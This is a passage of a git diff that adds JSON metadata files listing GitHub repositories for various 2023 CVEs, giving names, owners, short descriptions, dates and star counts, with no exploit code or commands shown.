+1,126 @@ +[ + { + "id": 660225162, + "name": "CVE-2023-2982", + "full_name": "RandomRobbieBF\/CVE-2023-2982", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-2982", + "description": "WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) <= 7.6.4 - Authentication Bypass", + "fork": false, + "created_at": "2023-06-29T14:21:08Z", + "updated_at": "2024-09-28T09:51:29Z", + "pushed_at": "2023-07-06T08:14:17Z", + "stargazers_count": 81, + "watchers_count": 81, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 19, + "watchers": 81, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 660554853, + "name": "CVE-2023-2982-POC", + "full_name": "H4K6\/CVE-2023-2982-POC", + "owner": { + "login": "H4K6", + "id": 83515195, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83515195?v=4", + "html_url": "https:\/\/github.com\/H4K6", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H4K6\/CVE-2023-2982-POC", + "description": "WordPress社交登录和注册(Discord,Google,Twitter,LinkedIn)<=7.6.4-绕过身份验证", + "fork": false, + "created_at": "2023-06-30T09:15:02Z", + "updated_at": "2024-10-29T18:27:48Z", + "pushed_at": "2023-07-07T14:22:49Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 663411527, + "name": "CVE-2023-2982", + "full_name": "LoaiEsam37\/CVE-2023-2982", + "owner": { + "login": "LoaiEsam37", + "id": 114489561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114489561?v=4", + "html_url": "https:\/\/github.com\/LoaiEsam37", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LoaiEsam37\/CVE-2023-2982", + "description": null, + "fork": false, + "created_at": "2023-07-07T08:25:38Z", + "updated_at": "2023-07-08T06:57:21Z", + "pushed_at": "2023-07-07T09:33:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 720332712, + "name": "CVE-2023-2982", + "full_name": "wshinkle\/CVE-2023-2982", + "owner": { + "login": "wshinkle", + "id": 91923278, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91923278?v=4", + "html_url": "https:\/\/github.com\/wshinkle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wshinkle\/CVE-2023-2982", + "description": null, + "fork": false, + "created_at": "2023-11-18T06:34:15Z", + "updated_at": "2023-11-18T06:44:45Z", + "pushed_at": "2023-11-18T06:44:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29839.json b/2023/CVE-2023-29839.json new file mode 100644 index 0000000000..a21000e074 --- /dev/null +++ b/2023/CVE-2023-29839.json @@ -0,0 +1,33 @@ +[ + { + "id": 635570742, + "name": "CVE-2023-29839", + "full_name": "jichngan\/CVE-2023-29839", + "owner": { + "login": "jichngan", + "id": 34933203, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34933203?v=4", + "html_url": "https:\/\/github.com\/jichngan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jichngan\/CVE-2023-29839", + "description": "Hotel Druid 3.0.4 Stored Cross Site Scripting Vulnerability ", + "fork": false, + "created_at": "2023-05-03T01:31:31Z", + "updated_at": "2023-05-03T16:14:09Z", + "pushed_at": "2023-05-26T03:04:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2986.json b/2023/CVE-2023-2986.json new file mode 100644 index 0000000000..3a2b577b55 --- /dev/null +++ b/2023/CVE-2023-2986.json @@ -0,0 +1,73 @@ +[ + { + "id": 651640673, + "name": "CVE-2023-2986", + "full_name": "Ayantaker\/CVE-2023-2986", + "owner": { + "login": "Ayantaker", + "id": 38920001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38920001?v=4", + "html_url": "https:\/\/github.com\/Ayantaker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ayantaker\/CVE-2023-2986", + "description": "Proof of Concept for vulnerability CVE-2023-2986 in 'Abandoned Cart Lite for WooCommerce' Plugin in WordPress", + "fork": false, + "created_at": "2023-06-09T17:44:09Z", + "updated_at": "2024-01-03T00:13:08Z", + "pushed_at": "2023-09-15T05:37:54Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "abandoned-cart-lite", + "cve-2023-2986", + "exploit", + "php", + "proof-of-concept", + "vulnerability", + "woocommerce", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 653318513, + "name": "CVE-2023-2986", + "full_name": "Alucard0x1\/CVE-2023-2986", + "owner": { + "login": "Alucard0x1", + "id": 3710918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3710918?v=4", + "html_url": "https:\/\/github.com\/Alucard0x1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alucard0x1\/CVE-2023-2986", + "description": "Proof of Concept for vulnerability CVE-2023-2986 in 'Abandoned Cart Lite for WooCommerce' Plugin in WordPress in Python Version", + "fork": false, + "created_at": "2023-06-13T20:35:03Z", + "updated_at": "2023-06-13T20:40:39Z", + "pushed_at": "2023-06-14T00:41:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29919.json b/2023/CVE-2023-29919.json new file mode 100644 index 0000000000..821cbe59dd --- /dev/null +++ b/2023/CVE-2023-29919.json @@ -0,0 +1,33 @@ +[ + { + "id": 642682480, + "name": "CVE-2023-29919", + "full_name": "xiaosed\/CVE-2023-29919", + "owner": { + "login": "xiaosed", + "id": 84080097, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84080097?v=4", + "html_url": "https:\/\/github.com\/xiaosed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiaosed\/CVE-2023-29919", + "description": null, + "fork": false, + "created_at": "2023-05-19T05:48:21Z", + "updated_at": "2023-05-19T05:48:21Z", + "pushed_at": "2023-05-19T06:08:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29922.json b/2023/CVE-2023-29922.json new file mode 100644 index 0000000000..7c5852ce45 --- /dev/null +++ b/2023/CVE-2023-29922.json @@ -0,0 +1,33 @@ +[ + { + "id": 702908363, + "name": "Powerjob-CVE-2023-29922-", + "full_name": "CN016\/Powerjob-CVE-2023-29922-", + "owner": { + "login": "CN016", + "id": 108575004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108575004?v=4", + "html_url": "https:\/\/github.com\/CN016", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CN016\/Powerjob-CVE-2023-29922-", + "description": "Powerjob 未授权访问漏洞(CVE-2023-29922)", + "fork": false, + "created_at": "2023-10-10T08:35:00Z", + "updated_at": "2023-10-10T08:41:21Z", + "pushed_at": "2023-10-10T08:41:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29923.json b/2023/CVE-2023-29923.json new file mode 100644 index 0000000000..d5a88a3420 --- /dev/null +++ b/2023/CVE-2023-29923.json @@ -0,0 +1,95 @@ +[ + { + "id": 644247652, + "name": "CVE-2023-29923", + "full_name": "1820112015\/CVE-2023-29923", + "owner": { + "login": "1820112015", + "id": 50662973, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50662973?v=4", + "html_url": "https:\/\/github.com\/1820112015", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1820112015\/CVE-2023-29923", + "description": "CVE-2023-29922 Batch detection script", + "fork": false, + "created_at": "2023-05-23T06:06:50Z", + "updated_at": "2024-08-10T17:53:39Z", + "pushed_at": "2023-05-23T06:48:40Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 15, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 645138371, + "name": "CVE-2023-29923-Scan", + "full_name": "3yujw7njai\/CVE-2023-29923-Scan", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2023-29923-Scan", + "description": "PowerJob <=4.3.2 未授权访问漏洞检测工具(CVE-2023-29922)", + "fork": false, + "created_at": "2023-05-25T02:24:51Z", + "updated_at": "2023-06-14T18:08:40Z", + "pushed_at": "2023-05-25T02:25:24Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646689306, + "name": "CVE-2023-29923", + "full_name": "Le1a\/CVE-2023-29923", + "owner": { + "login": "Le1a", + "id": 97610822, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97610822?v=4", + "html_url": "https:\/\/github.com\/Le1a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Le1a\/CVE-2023-29923", + "description": "PowerJob V4.3.1 Unauthorized Vulnerability Exploit", + "fork": false, + "created_at": "2023-05-29T05:48:35Z", + "updated_at": "2023-06-20T08:27:03Z", + "pushed_at": "2023-05-29T05:51:18Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29929.json b/2023/CVE-2023-29929.json new file mode 100644 index 0000000000..78fda42b41 --- /dev/null +++ b/2023/CVE-2023-29929.json @@ -0,0 +1,33 @@ +[ + { + "id": 627966808, + "name": "CVE-2023-29929", + "full_name": "YSaxon\/CVE-2023-29929", + "owner": { + "login": "YSaxon", + "id": 11711101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11711101?v=4", + "html_url": "https:\/\/github.com\/YSaxon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YSaxon\/CVE-2023-29929", + "description": null, + "fork": false, + "created_at": "2023-04-14T15:41:12Z", + "updated_at": "2024-08-22T21:06:49Z", + "pushed_at": "2024-08-22T21:05:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29930.json b/2023/CVE-2023-29930.json new file mode 100644 index 0000000000..5009380279 --- /dev/null +++ b/2023/CVE-2023-29930.json @@ -0,0 +1,33 @@ +[ + { + "id": 382216567, + "name": "TFTPlunder", + "full_name": "YSaxon\/TFTPlunder", + "owner": { + "login": "YSaxon", + "id": 11711101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11711101?v=4", + "html_url": "https:\/\/github.com\/YSaxon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YSaxon\/TFTPlunder", + "description": "Info and exploit for CVE-2023-29930: blind file read\/write in Genesys TFTP provisioning server configuration", + "fork": false, + "created_at": "2021-07-02T03:10:53Z", + "updated_at": "2024-03-01T03:52:43Z", + "pushed_at": "2023-05-09T16:50:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-29983.json b/2023/CVE-2023-29983.json new file mode 100644 index 0000000000..a780550a0a --- /dev/null +++ b/2023/CVE-2023-29983.json @@ -0,0 +1,33 @@ +[ + { + "id": 634374104, + "name": "CVE-2023-29983", + "full_name": "zPrototype\/CVE-2023-29983", + "owner": { + "login": "zPrototype", + "id": 43825360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43825360?v=4", + "html_url": "https:\/\/github.com\/zPrototype", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zPrototype\/CVE-2023-29983", + "description": null, + "fork": false, + "created_at": "2023-04-29T22:52:03Z", + "updated_at": "2023-04-30T21:43:15Z", + "pushed_at": "2023-04-30T15:43:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-30033.json b/2023/CVE-2023-30033.json new file mode 100644 index 0000000000..2666d710b0 --- /dev/null +++ b/2023/CVE-2023-30033.json @@ -0,0 +1,33 @@ +[ + { + "id": 709099001, + "name": "CVE-2023-30033", + "full_name": "phucodeexp\/CVE-2023-30033", + "owner": { + "login": "phucodeexp", + "id": 148666067, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148666067?v=4", + "html_url": "https:\/\/github.com\/phucodeexp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phucodeexp\/CVE-2023-30033", + "description": null, + "fork": false, + "created_at": "2023-10-24T02:23:03Z", + "updated_at": "2023-10-24T02:27:13Z", + "pushed_at": "2023-10-24T02:27:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-3009.json b/2023/CVE-2023-3009.json new file mode 100644 index 0000000000..1f0456d54a --- /dev/null +++ b/2023/CVE-2023-3009.json @@ -0,0 +1,33 @@ +[ + { + "id": 647841029, + "name": "CVE-2023-3009", + "full_name": "mnqazi\/CVE-2023-3009", + "owner": { + "login": "mnqazi", + "id": 32686360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32686360?v=4", + "html_url": "https:\/\/github.com\/mnqazi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mnqazi\/CVE-2023-3009", + "description": "Stored XSS vulnerability in Teampass < 3.0.9 (Bypass of CVE-2023–2516) — M Nadeem Qazi ", + "fork": false, + "created_at": "2023-05-31T16:23:23Z", + "updated_at": "2023-06-01T12:29:55Z", + "pushed_at": "2023-05-31T16:31:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-30092.json b/2023/CVE-2023-30092.json new file mode 100644 index 0000000000..f71d59278d --- /dev/null +++ b/2023/CVE-2023-30092.json @@ -0,0 +1,33 @@ +[ + { + "id": 637649717, + "name": "CVE-2023-30092", + "full_name": "nawed20002\/CVE-2023-30092", + "owner": { + "login": "nawed20002", + "id": 98532470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98532470?v=4", + "html_url": "https:\/\/github.com\/nawed20002", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nawed20002\/CVE-2023-30092", + "description": null, + "fork": false, + "created_at": "2023-05-08T05:55:31Z", + "updated_at": "2023-05-08T05:59:36Z", + "pushed_at": "2023-05-10T07:56:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-30145.json b/2023/CVE-2023-30145.json new file mode 100644 index 0000000000..ae9f5fc99e --- /dev/null +++ b/2023/CVE-2023-30145.json @@ -0,0 +1,33 @@ +[ + { + "id": 645337610, + "name": "CVE-2023-30145", + "full_name": "paragbagul111\/CVE-2023-30145", + "owner": { + "login": "paragbagul111", + "id": 68190427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68190427?v=4", + "html_url": "https:\/\/github.com\/paragbagul111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paragbagul111\/CVE-2023-30145", + "description": "Camaleon CMS v2.7.0 contain a Server-Side Template Injection (SSTI) vulnerability ", + "fork": false, + "created_at": "2023-05-25T12:35:27Z", + "updated_at": "2024-08-10T17:54:07Z", + "pushed_at": "2023-05-26T12:07:24Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-30146.json b/2023/CVE-2023-30146.json new file mode 100644 index 0000000000..43a8f3f2d6 --- /dev/null +++ b/2023/CVE-2023-30146.json @@ -0,0 +1,38 @@ +[ + { + "id": 651201551, + "name": "CVE-2023-30146", + "full_name": "L1-0\/CVE-2023-30146", + "owner": { + "login": "L1-0", + "id": 123986259, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123986259?v=4", + "html_url": "https:\/\/github.com\/L1-0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/L1-0\/CVE-2023-30146", + "description": "Some Assmann manufactured IP-Cams leak the administrator password in their backup. ", + "fork": false, + "created_at": "2023-06-08T18:18:47Z", + "updated_at": "2024-10-09T11:21:33Z", + "pushed_at": "2023-08-03T11:48:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "poc", + "python" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-30185.json b/2023/CVE-2023-30185.json new file mode 100644 index 0000000000..e1fa811cee --- /dev/null +++ b/2023/CVE-2023-30185.json @@ -0,0 +1,33 @@ +[ + { + "id": 636590324, + "name": "CVE-2023-30185", + "full_name": "c7w1n\/CVE-2023-30185", + "owner": { + "login": "c7w1n", + "id": 92280784, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92280784?v=4", + "html_url": "https:\/\/github.com\/c7w1n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c7w1n\/CVE-2023-30185", + "description": null, + "fork": false, + "created_at": "2023-05-05T07:39:31Z", + "updated_at": "2023-05-05T07:39:31Z", + "pushed_at": "2023-05-08T19:23:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-30190.json b/2023/CVE-2023-30190.json new file mode 100644 index 0000000000..f77c1fba55 --- /dev/null +++ b/2023/CVE-2023-30190.json @@ -0,0 +1,33 @@ +[ + { + "id": 714643620, + "name": "CVE-2023-30190-FOLLINA", + "full_name": "MojithaR\/CVE-2023-30190-FOLLINA", + "owner": { + "login": "MojithaR", + "id": 127576267, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127576267?v=4", + "html_url": "https:\/\/github.com\/MojithaR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MojithaR\/CVE-2023-30190-FOLLINA", + "description": null, + "fork": false, + "created_at": "2023-11-05T13:36:07Z", + "updated_at": "2024-08-23T04:10:49Z", + "pushed_at": "2023-11-19T12:49:58Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-30212.json b/2023/CVE-2023-30212.json new file mode 100644 index 0000000000..b7949f2fa8 --- /dev/null +++ b/2023/CVE-2023-30212.json @@ -0,0 +1,498 @@ +[ + { + "id": 645399898, + "name": "CVE-2023-30212-LAB", + "full_name": "kuttappu123\/CVE-2023-30212-LAB", + "owner": { + "login": "kuttappu123", + "id": 102424737, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102424737?v=4", + "html_url": "https:\/\/github.com\/kuttappu123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kuttappu123\/CVE-2023-30212-LAB", + "description": null, + "fork": false, + "created_at": "2023-05-25T15:04:34Z", + "updated_at": "2024-01-27T16:21:39Z", + "pushed_at": "2023-05-26T16:27:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 645430158, + "name": "CVE-2023-30212-POC-DOCKER-FILE", + "full_name": "Rishipatidar\/CVE-2023-30212-POC-DOCKER-FILE", + "owner": { + "login": "Rishipatidar", + "id": 53944784, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53944784?v=4", + "html_url": "https:\/\/github.com\/Rishipatidar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rishipatidar\/CVE-2023-30212-POC-DOCKER-FILE", + "description": "This repository provides a Docker container for simulating the CVE-2023-30212 vulnerability, allowing you to practice and understand its impact. It includes a comprehensive guide to help you set up the container on your own computer. The documentation for the Docker creation process is also included.", + "fork": false, + "created_at": "2023-05-25T16:23:47Z", + "updated_at": "2023-05-25T18:50:08Z", + "pushed_at": "2023-05-25T18:28:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 645721252, + "name": "CVE-2023-30212-Lab", + "full_name": "mallutrojan\/CVE-2023-30212-Lab", + "owner": { + "login": "mallutrojan", + "id": 71654039, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71654039?v=4", + "html_url": "https:\/\/github.com\/mallutrojan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mallutrojan\/CVE-2023-30212-Lab", + "description": "GitHub repository with Dockerfile and files to create a vulnerable environment for CVE-2023-30212, enabling exploration of the exploitability of this security vulnerability. Ideal for research and security enthusiasts to study and understand the impact of the vulnerability in a controlled setting.", + "fork": false, + "created_at": "2023-05-26T09:33:23Z", + "updated_at": "2023-05-27T06:47:07Z", + "pushed_at": "2023-05-27T06:58:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 645938533, + "name": "CVE-2023-30212_lab", + "full_name": "Anandhu990\/CVE-2023-30212_lab", + "owner": { + "login": "Anandhu990", + "id": 134521477, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134521477?v=4", + "html_url": "https:\/\/github.com\/Anandhu990", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Anandhu990\/CVE-2023-30212_lab", + "description": null, + "fork": false, + "created_at": "2023-05-26T20:04:17Z", + "updated_at": "2023-05-26T20:04:18Z", + "pushed_at": "2023-05-26T20:18:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646030973, + "name": "CVE-2023-30212", + "full_name": "libas7994\/CVE-2023-30212", + "owner": { + "login": "libas7994", + "id": 134738008, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134738008?v=4", + "html_url": "https:\/\/github.com\/libas7994", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/libas7994\/CVE-2023-30212", + "description": "Docker environment and exploit the CVE-2023-30212 is a security vulnerability that affects versions of OURPHP prior to or equal to 7.2.0 .This vulnerability allows for Cross-Site Scripting (XSS) attacks", + "fork": false, + "created_at": "2023-05-27T04:24:12Z", + "updated_at": "2023-05-27T04:24:13Z", + "pushed_at": "2023-05-27T04:24:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646036513, + "name": "Vulnerable-Docker-Environment-CVE-2023-30212", + "full_name": "libasmon\/Vulnerable-Docker-Environment-CVE-2023-30212", + "owner": { + "login": "libasmon", + "id": 134760409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134760409?v=4", + "html_url": "https:\/\/github.com\/libasmon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/libasmon\/Vulnerable-Docker-Environment-CVE-2023-30212", + "description": "Docker environment and exploit the CVE-2023-30212 vulnerability that affects versions of OURPHP prior to or equal to 7.2.0. This vulnerability allows for Cross-Site Scripting (XSS) attacks", + "fork": false, + "created_at": "2023-05-27T04:53:28Z", + "updated_at": "2023-05-27T04:53:28Z", + "pushed_at": "2023-05-27T04:53:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646039109, + "name": "-create-a-vulnerable-Docker-environment-that-is-susceptible-to-CVE-2023-30212", + "full_name": "libasmon\/-create-a-vulnerable-Docker-environment-that-is-susceptible-to-CVE-2023-30212", + "owner": { + "login": "libasmon", + "id": 134760409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134760409?v=4", + "html_url": "https:\/\/github.com\/libasmon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/libasmon\/-create-a-vulnerable-Docker-environment-that-is-susceptible-to-CVE-2023-30212", + "description": "Docker environment and exploit the CVE-2023-30212 vulnerabilityVE-2023-30212 is a security vulnerability that affects versions of OURPHP prior to or equal to 7.2.0. This vulnerability allows for Cross-Site Scripting (XSS) attacks", + "fork": false, + "created_at": "2023-05-27T05:06:17Z", + "updated_at": "2023-05-27T05:06:17Z", + "pushed_at": "2023-05-27T06:38:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646059947, + "name": "Exploite-CVE-2023-30212-Vulnerability", + "full_name": "libasmon\/Exploite-CVE-2023-30212-Vulnerability", + "owner": { + "login": "libasmon", + "id": 134760409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134760409?v=4", + "html_url": "https:\/\/github.com\/libasmon", + "user_view_type": "public" + }, + 